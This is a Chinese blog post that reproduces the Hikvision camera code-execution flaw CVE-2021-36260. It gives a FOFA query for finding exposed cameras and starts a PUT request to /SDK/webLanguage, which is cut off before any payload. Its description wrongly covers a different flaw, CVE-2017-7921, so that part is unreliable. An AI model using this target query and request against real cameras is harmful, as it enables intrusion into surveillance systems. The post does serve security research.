【漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)

已于 2024-01-20 09:43:58 修改
阅读量2.2k 收藏 11
点赞数 9
文章标签: web安全
于 2024-01-20 09:42:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135711258
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。

Nx02 漏洞描述

        Hikvision摄像头产品的越权漏洞(CVE-2017-7921)是一种严重的安全问题,该漏洞允许未经授权的用户访问和控制系统。通过特定的路径访问Hikvision摄像头的某些功能,包括检索所有用户及其角色的列表、获取相机快照以及下载摄像头配置账号密码文件等。

Nx03 产品主页

fofa-query: app="HIKVISION-视频监控"

Nx04 漏洞复现

漏洞点位于/SDK/webLanguage 利用PUT方法上传xml数据:

PUT /SDK/webLanguage HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 80
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

<?xml version="1.0" encoding=
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录

已下架不支持订阅

漏洞复现Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 1372
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
关于 海康威视 摄像头的整理-附件资源
03-05
关于 海康威视 摄像头的整理-附件资源
由于严重缺陷,海康威视摄像机可能被远程黑客攻击
TrustAsia的博客
09-24 4681
一个被跟踪为 CVE-2021-36260 的关键问题影响了 70 多个海康威视设备模型,并且可能允许攻击者接管它们。 一个跟踪为 CVE-2021-36260 的严重漏洞影响了 70 多个海康威视摄像头和 NVR 型号,并允许攻击者接管设备。 该漏洞海康威视 IP 摄像机/NVR 固件中的一个未经身份验证的远程代码执行 (RCE) 漏洞,由安全研究人员发现,该安全研究人员以“Watchful IP”为绰号上网。 “即使使用最新的固件(截至 2021 年 6 月 21 日),海康威视摄像
海康摄像头CVE-2021-36260漏洞复现
最新发布
A_991128a的博客
04-25 1415
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)
红队是青春
01-27 5859
CVE-2021-36260海康威视代码执行漏洞复现
海康威视漏洞合集
weixin_46626737的博客
07-03 3791
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 3677
海康威视越权访问CVE-2021-7921漏洞复现
漏洞复现海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
热门推荐
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行
漏洞复现海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 7967
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 4381
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
HIKVISION控制命令文档
08-24
海康PTZ控制命令手册,isapi ptz service manual 2.0..
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
该程序可以提取由于授权问题影响的多款Hikvision产品的config...CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
configurationFile配置文件解密
HIKVISION 摄像头 DS-2DC2402IW-D3-W 英文版说明书
04-16
HIKVISION 摄像头 DS-2DC2402IW-D3-W 是一款中文摄像头 没有英文版技术文档,本文档整合中文文档为英文文档,给海外客户使用。
hikvision-isapi
09-28
包含所有接口请求头格式,body内容xml格式,包含接口如下/ISAPI/AUXInfo、/ISAPI/ContentMgmt、/ISAPI/Event、/ISAPI/Image、/ISAPI/SDT、/ISAPI/PTZCtrl、/ISAPI/Security、/ISAPI/Smart、/ISAPI/Streaming、/ISAPI...
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 8296
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
ds-2cd234xyzuv3-abcdef 海康威视(hikvision) 摄像头漏洞复现
12-21
ds-2cd234xyzuv3-abcdef是海康威视(hikvision)公司的摄像头型号,最近被发现存在安全漏洞。该漏洞可能会导致黑客远程攻击和入侵摄像头系统,进而窃取用户的隐私信息或者对系统进行破坏。这对用户和公共安全都构成了潜在威胁。 针对该摄像头漏洞复现工作已经展开,安全研究人员正在尝试利用该漏洞摄像头系统进行攻击,并重现漏洞的具体影响和危害。通过复现漏洞,可以更清晰地了解漏洞的工作原理和影响范围,有助于推动厂商尽快修复漏洞并发布安全补丁。 除了复现漏洞外,安全研究人员还会在漏洞披露后向厂商报告漏洞细节,为修复漏洞提供技术支持。同时,用户也需要进行及时的摄像头固件更新和安全设置,以防止遭受潜在攻击。 总之,对ds-2cd234xyzuv3-abcdef摄像头漏洞复现工作是非常重要的,它有助于加强对漏洞的理解和防范措施,保障用户和公共安全。希望厂商和安全社区能够共同努力,尽快解决该漏洞带来的安全隐患。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值